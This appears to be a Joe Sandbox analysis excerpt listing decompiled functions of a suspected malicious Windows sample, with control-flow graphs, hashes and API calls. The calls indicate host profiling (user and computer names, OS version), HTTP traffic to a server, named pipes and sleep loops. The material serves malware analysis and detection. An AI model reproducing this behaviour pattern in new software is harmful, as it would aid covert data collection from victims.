                            • InternetCloseHandle.WININET(00000000), ref: 00DB2DAF
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5EFC
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB5EEC: __snprintf.LIBCMT ref: 00DB5F59
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F90
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F9B
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FC6
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB5FB6: __snprintf.LIBCMT ref: 00DB602E
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB604C
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB6057
                            • InternetQueryDataAvailable.WININET(00000000,00DB158B,00000000,00000000), ref: 00DB2DC0
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00DB2DEE
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E0E
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                            • String ID: %s%s$*/*
                            • API String ID: 2172916581-856325523
                            • Opcode ID: f2261827d8974748310db327985d8dd93d49b4ee832212f1f452f378845dce21
                            • Instruction ID: b5d233cf7fad8aab5e8b8d5a585120e5f14a14f72ec0b6661b5db1504d37f184
                            • Opcode Fuzzy Hash: f2261827d8974748310db327985d8dd93d49b4ee832212f1f452f378845dce21
                            • Instruction Fuzzy Hash: 4E519D72900219FFDF11AFA5DC85EFEBBB9EB04310B04446AF516A7261DA309A45CBB4
                            Function 0040116C Relevance: 19.7, APIs: 13, Instructions: 199sleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 54 40116c-40118a 55 401430-40143c GetStartupInfoA 54->55 56 401190-4011a1 54->56 57 4011bc-4011c8 56->57 58 4011a8-4011aa 57->58 59 4011ca-4011d4 57->59 62 4011b0-4011b9 Sleep 58->62 63 4013c8-4013d5 58->63 60 4011da-4011e1 59->60 61 4013db-4013ef _amsg_exit 59->61 66 401460-401479 _initterm 60->66 67 4011e7-4011f9 60->67 64 4013f5-401415 _initterm 61->64 65 4011ff-401201 61->65 62->57 63->60 63->61 68 401207-40120e 64->68 69 40141b-401421 64->69 65->68 65->69 70 401483 66->70 67->64 67->65 71 401210-401229 68->71 72 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 68->72 69->68 74 40148b-40149a exit 70->74 71->72 81 401281-401287 72->81 82 40126e 72->82 84 401270-401272 81->84 85 401289-401294 81->85 83 4012bd-4012c5 82->83 86 4012c7-4012d0 83->86 87 4012db-4012fb malloc 83->87 88 401274-401277 84->88 89 4012b8 84->89 90 40127e 85->90 91 4012d6 86->91 92 4013b8-4013bc 86->92 87->70 93 401301-40130d 87->93 94 4012a0-4012a2 88->94 95 401279 88->95 89->83 90->81 91->87 92->91 96 401310-401344 strlen malloc memcpy 93->96 94->89 97 4012a4 94->97 95->90 96->96 98 401346-401393 call 401960 call 4029e0 96->98 99 4012a8-4012b1 97->99 98->74 105 401399-4013a1 98->105 99->89 101 4012b3-4012b6 99->101 101->89 101->99 106 4013a7-4013b2 105->106 107 401448-40145d _cexit 105->107
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                            • String ID:
                            • API String ID: 1672962128-0
                            • Opcode ID: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
                            • Instruction ID: cd1cdbe7929d0bdf955f1aec1ac9dc0fa1fb6e5342f4dd5585025b5f235b2fbc
                            • Opcode Fuzzy Hash: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
                            • Instruction Fuzzy Hash: 13817BB5A043058FDB10DF69E98476E77E0FB49305F00443EEA84AB3A2D779D845CB8A
                            Function 00DB7F09 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DB7F6E
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DB7F7E
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7F92
                            • _strrchr.LIBCMT ref: 00DB7FA1
                            • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7FBC
                            • __snprintf.LIBCMT ref: 00DB8028
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                            • String ID: %s%s%s
                            • API String ID: 1877169212-1891519693
                            • Opcode ID: 9b48ae569941062a8ba7aa3ac8932514c71d4a8eeed8b60b5f5f3d8e69d11342
                            • Instruction ID: 051df6b8c47dd3ac032988e7781ad838a73aac6732b36ed9eced96f1f2c9f4a9
                            • Opcode Fuzzy Hash: 9b48ae569941062a8ba7aa3ac8932514c71d4a8eeed8b60b5f5f3d8e69d11342
                            • Instruction Fuzzy Hash: 5A418A72D00205EECF11AFA1EC4A9FEBFB8EF04710F10445AF401A6291DB758A41EB70
                            Function 00DB7F09 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DB7F6E
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DB7F7E
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7F92
                            • _strrchr.LIBCMT ref: 00DB7FA1
                            • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7FBC
                            • __snprintf.LIBCMT ref: 00DB8028
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                            • String ID: %s%s%s
                            • API String ID: 1877169212-1891519693
                            • Opcode ID: 39aaea07771c17afe4aa773ca0ad8f35589e51179ff3fcfdb541bfce4877fe4f
                            • Instruction ID: 051df6b8c47dd3ac032988e7781ad838a73aac6732b36ed9eced96f1f2c9f4a9
                            • Opcode Fuzzy Hash: 39aaea07771c17afe4aa773ca0ad8f35589e51179ff3fcfdb541bfce4877fe4f
                            • Instruction Fuzzy Hash: 5A418A72D00205EECF11AFA1EC4A9FEBFB8EF04710F10445AF401A6291DB758A41EB70
                            Function 004013C1 Relevance: 12.1, APIs: 8, Instructions: 108stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 204 4013c1-4013d5 206 4011da-4011e1 204->206 207 4013db-4013ef _amsg_exit 204->207 210 401460-401479 _initterm 206->210 211 4011e7-4011f9 206->211 208 4013f5-401415 _initterm 207->208 209 4011ff-401201 207->209 212 401207-40120e 208->212 213 40141b-401421 208->213 209->212 209->213 214 401483 210->214 211->208 211->209 215 401210-401229 212->215 216 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 212->216 213->212 218 40148b-40149a exit 214->218 215->216 225 401281-401287 216->225 226 40126e 216->226 228 401270-401272 225->228 229 401289-401294 225->229 227 4012bd-4012c5 226->227 230 4012c7-4012d0 227->230 231 4012db-4012fb malloc 227->231 232 401274-401277 228->232 233 4012b8 228->233 234 40127e 229->234 235 4012d6 230->235 236 4013b8-4013bc 230->236 231->214 237 401301-40130d 231->237 238 4012a0-4012a2 232->238 239 401279 232->239 233->227 234->225 235->231 236->235 240 401310-401344 strlen malloc memcpy 237->240 238->233 241 4012a4 238->241 239->234 240->240 242 401346-401381 call 401960 call 4029e0 240->242 243 4012a8-4012b1 241->243 248 401386-401393 242->248 243->233 245 4012b3-4012b6 243->245 245->233 245->243 248->218 249 401399-4013a1 248->249 250 4013a7-4013b2 249->250 251 401448-40145d _cexit 249->251
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
                            • String ID:
                            • API String ID: 2053141405-0
                            • Opcode ID: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
                            • Instruction ID: 176527dceee54676b3400d832f202c7b1996cfd354b1dcf2f579e8dd7b9a5ba8
                            • Opcode Fuzzy Hash: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
                            • Instruction Fuzzy Hash: 974118B4A043058FDB10EF65E98575EBBE0FB48705F10843EE984A73A2D7B8D845CB59
                            Function 004011A3 Relevance: 10.6, APIs: 7, Instructions: 114sleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 252 4011a3-4011a7 253 4011a8-4011aa 252->253 254 4011b0-4011c8 Sleep 253->254 255 4013c8-4013d5 253->255 254->253 261 4011ca-4011d4 254->261 257 4011da-4011e1 255->257 258 4013db-4013ef _amsg_exit 255->258 262 401460-401479 _initterm 257->262 263 4011e7-4011f9 257->263 259 4013f5-401415 _initterm 258->259 260 4011ff-401201 258->260 264 401207-40120e 259->264 265 40141b-401421 259->265 260->264 260->265 261->257 261->258 266 401483 262->266 263->259 263->260 267 401210-401229 264->267 268 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 264->268 265->264 270 40148b-40149a exit 266->270 267->268 277 401281-401287 268->277 278 40126e 268->278 280 401270-401272 277->280 281 401289-401294 277->281 279 4012bd-4012c5 278->279 282 4012c7-4012d0 279->282 283 4012db-4012fb malloc 279->283 284 401274-401277 280->284 285 4012b8 280->285 286 40127e 281->286 287 4012d6 282->287 288 4013b8-4013bc 282->288 283->266 289 401301-40130d 283->289 290 4012a0-4012a2 284->290 291 401279 284->291 285->279 286->277 287->283 288->287 292 401310-401344 strlen malloc memcpy 289->292 290->285 293 4012a4 290->293 291->286 292->292 294 401346-401393 call 401960 call 4029e0 292->294 295 4012a8-4012b1 293->295 294->270 301 401399-4013a1 294->301 295->285 297 4012b3-4012b6 295->297 297->285 297->295 302 4013a7-4013b2 301->302 303 401448-40145d _cexit 301->303
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
                            • String ID:
                            • API String ID: 2230096795-0
                            • Opcode ID: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
                            • Instruction ID: ee64299d2f4f8c50c0c592fa26e83c8470f2d6fe6e7dfb634f206cb54a3f681e
                            • Opcode Fuzzy Hash: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
                            • Instruction Fuzzy Hash: 7F4107B4A043058FDB10DF69E98471EBBE0BB48705F14453EE988A73A2D778D845CB99
                            Function 00401160 Relevance: 9.1, APIs: 6, Instructions: 130sleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 401160-40118a 306 401430-40143c GetStartupInfoA 304->306 307 401190-4011a1 304->307 308 4011bc-4011c8 307->308 309 4011a8-4011aa 308->309 310 4011ca-4011d4 308->310 313 4011b0-4011b9 Sleep 309->313 314 4013c8-4013d5 309->314 311 4011da-4011e1 310->311 312 4013db-4013ef _amsg_exit 310->312 317 401460-401479 _initterm 311->317 318 4011e7-4011f9 311->318 315 4013f5-401415 _initterm 312->315 316 4011ff-401201 312->316 313->308 314->311 314->312 319 401207-40120e 315->319 320 40141b-401421 315->320 316->319 316->320 321 401483 317->321 318->315 318->316 322 401210-401229 319->322 323 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 319->323 320->319 325 40148b-40149a exit 321->325 322->323 332 401281-401287 323->332 333 40126e 323->333 335 401270-401272 332->335 336 401289-401294 332->336 334 4012bd-4012c5 333->334 337 4012c7-4012d0 334->337 338 4012db-4012fb malloc 334->338 339 401274-401277 335->339 340 4012b8 335->340 341 40127e 336->341 342 4012d6 337->342 343 4013b8-4013bc 337->343 338->321 344 401301-40130d 338->344 345 4012a0-4012a2 339->345 346 401279 339->346 340->334 341->332 342->338 343->342 347 401310-401344 strlen malloc memcpy 344->347 345->340 348 4012a4 345->348 346->341 347->347 349 401346-401393 call 401960 call 4029e0 347->349 350 4012a8-4012b1 348->350 349->325 356 401399-4013a1 349->356 350->340 352 4012b3-4012b6 350->352 352->340 352->350 357 4013a7-4013b2 356->357 358 401448-40145d _cexit 356->358
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                            • String ID:
                            • API String ID: 1672962128-0
                            • Opcode ID: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
                            • Instruction ID: 14d090d825811c9464361f5f824c2d109dd69b69c83bbf3de982eb4becc4467a
                            • Opcode Fuzzy Hash: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
                            • Instruction Fuzzy Hash: ED5168B5A043058FDB10DFA9E984B1ABBE0FB48705F10453EE944AB3A2D778D845CB99
                            Function 00DBEF82 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44encryptionCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 359 dbef82-dbefa9 CryptAcquireContextA 360 dbefab-dbefbc CryptAcquireContextA 359->360 361 dbefc2-dbefd5 CryptGenRandom 359->361 360->361 362 dbefbe-dbefc1 360->362 363 dbefd7-dbefe4 CryptReleaseContext 361->363 364 dbefe6-dbefe8 361->364 363->362 364->363
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000000,00000000,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFA5
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFB8
                            • CryptGenRandom.ADVAPI32(00000000,00DB8090,?,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFCC
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFDC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$Acquire$RandomRelease
                            • String ID: Microsoft Base Cryptographic Provider v1.0
                            • API String ID: 685801729-291530887
                            • Opcode ID: c824a87fc7bcef90be91e0c10a0595d917fa9b64215f6cb250d63412a41fde4d
                            • Instruction ID: 9ce8746fe4fd27adf1750e7c226bee9a776fa879ce86400dd87352f20aeafa19
                            • Opcode Fuzzy Hash: c824a87fc7bcef90be91e0c10a0595d917fa9b64215f6cb250d63412a41fde4d
                            • Instruction Fuzzy Hash: A9F08136A45218F7DF214695CC09FEF7B6CDB49764F214052FA01E7280D770EA00A6B4
                            Function 0040161C Relevance: 6.1, APIs: 4, Instructions: 56pipefileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 540 40161c-401680 CreateNamedPipeA 541 401682-401697 ConnectNamedPipe 540->541 542 4016d9-4016e0 540->542 541->542 543 401699-40169b 541->543 544 4016c4-4016ce CloseHandle 543->544 545 40169d-4016c2 WriteFile 543->545 544->542 545->544 546 4016d0-4016d7 545->546 546->543
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                            • String ID:
                            • API String ID: 2239253087-0
                            • Opcode ID: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
                            • Instruction ID: 647ba10e4562674360e559436f846850fae7207d816ad69ae546ddef800915d1
                            • Opcode Fuzzy Hash: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
                            • Instruction Fuzzy Hash: C1114CB0804305AFD7109F66C84836FBBF8EB84359F00892EE895973A1D37AC4488F96
                            Function 00401805 Relevance: 21.0, APIs: 3, Strings: 9, Instructions: 31threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 53 401805-4018b9 GetTickCount sprintf CreateThread
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CountCreateThreadTicksprintf
                            • String ID: .$\$\$\$\$e$i$p$p
                            • API String ID: 1367138260-609229641
                            • Opcode ID: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
                            • Instruction ID: 85e9528532d9762a1f7b070758f0f1347f94744085bed28000c50463c0499d60
                            • Opcode Fuzzy Hash: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
                            • Instruction Fuzzy Hash: E50160B4408701DFE3009F16D55C31BBEE1AB84749F00891DE5991A2A1C7BE864CCF9A
                            Function 00DB8060 Relevance: 12.1, APIs: 8, Instructions: 124COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetACP.KERNEL32(00000000,00000000,00000080,?,?,?,?,?,?,?,?,00DB14C0,00000000,00000000), ref: 00DB8069
                            • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,00DB14C0,00000000,00000000), ref: 00DB8075
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB80A2
                            • GetTickCount.KERNEL32 ref: 00DB80A6
                              • Part of subcall function 00DC8C0A: __getptd.LIBCMT ref: 00DC8C0F
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB80D3
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB8139
                            • _memset.LIBCMT ref: 00DB8170
                            • _memset.LIBCMT ref: 00DB81AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$_memset$CountTick__getptd
                            • String ID:
                            • API String ID: 3908538216-0
                            • Opcode ID: d06c872a493a1bbc6f599a6ea7021751f94745041d3f1e6cede3c86d3d1ba40e
                            • Instruction ID: b632cb67fe1df459fcf343a40658facea095608a3b5f37190c61c92322d5459f
                            • Opcode Fuzzy Hash: d06c872a493a1bbc6f599a6ea7021751f94745041d3f1e6cede3c86d3d1ba40e
                            • Instruction Fuzzy Hash: A4319373900208FADB11BBB1AC46EEE7FA8DF08364F14405AF906E7292DE75CA449670
                            Function 00DB273C Relevance: 9.1, APIs: 6, Instructions: 115networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                            • InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 00DB27E1
                            • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 00DB27F1
                            • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 00DB283A
                            • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 00DB2856
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Option$ConnectOpen
                            • String ID:
                            • API String ID: 230958251-0
                            • Opcode ID: 914df7411ac79997f32733a4b41e1db7f444c1ff1bc1f583dbab305b7250317f
                            • Instruction ID: 5e353c7e07c26f5a540faeb86b22f755710cfb2533c092586ffec43f39df2e5b
                            • Opcode Fuzzy Hash: 914df7411ac79997f32733a4b41e1db7f444c1ff1bc1f583dbab305b7250317f
                            • Instruction Fuzzy Hash: 9831C272590384FAEA313B61AC4AFFB3F29EB81B14F10502AF602DD1D1DE758A45C678
                            Function 00DB131C Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 db131c-db1427 call db81bc call db8382 * 3 call dbc2f3 call dbc2dd call dbc2e8 call dbc2f3 * 2 call dc87ff call dbc2e8 * 3 call dbc2dd call dbcb1c call db5c3e call dbea37 * 2 call db386e 404 db1429 call dbde47 365->404 405 db142e-db1441 call dbc2e8 call db38b1 365->405 404->405 411 db1448-db144f call db38cc 405->411 412 db1443 call dbde47 405->412 416 db1451 call dbde47 411->416 417 db1456-db145d call db3927 411->417 412->411 416->417 421 db145f call dbde47 417->421 422 db1464-db1494 call dbc2dd call dbc2e8 call dc87ff 417->422 421->422 430 db149b-db14c6 call dbc2e8 call dbea37 call dbc2e8 call db8060 422->430 431 db1496 call dbde47 422->431 441 db14c7-db14c8 430->441 431->430 442 db14ce-db153e call dbcdfa call dc8956 call dbcdfa call dc8956 * 2 call db5c6a 441->442 443 db16ac-db16ca call dbcea0 call dc8722 call dbde47 441->443 462 db155f-db1592 call db273c call dbc2e8 call db2e3d 442->462 463 db1540-db1545 442->463 475 db15bd-db15c0 462->475 476 db1594-db15a2 call dbbcc5 462->476 465 db1548-db154d 463->465 465->465 467 db154f-db1551 465->467 467->462 468 db1553-db155e call db6072 467->468 468->462 477 db1628 475->477 478 db15c2-db15d1 call db8fa1 call dbc2e8 475->478 484 db15b2-db15b5 476->484 485 db15a4-db15b0 call dba36c 476->485 482 db1630-db163c call db2874 call db386e 477->482 494 db15da 478->494 495 db15d3-db15d8 478->495 496 db163e call dbde47 482->496 497 db1643-db1657 call dbce28 482->497 484->475 485->475 498 db15df-db15f6 call db4f55 call db7853 call db7017 call db386e 494->498 495->498 496->497 504 db1659 call dbde47 497->504 505 db165e-db1666 497->505 524 db15f8 call db2fb7 498->524 525 db15fd-db1604 498->525 504->505 505->443 508 db1668-db166f 505->508 510 db169a-db169b call db54a0 508->510 511 db1671-db167f 508->511 519 db16a0-db16a7 510->519 514 db1692 511->514 515 db1681-db1690 call db300f 511->515 517 db1694-db1696 514->517 515->517 517->510 521 db1698 517->521 519->441 521->510 524->525 525->482 527 db1606-db1626 call db2874 call db273c call db2962 525->527 527->482
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _malloc.LIBCMT ref: 00DB13B2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                              • Part of subcall function 00DBCB1C: __time64.LIBCMT ref: 00DBCB28
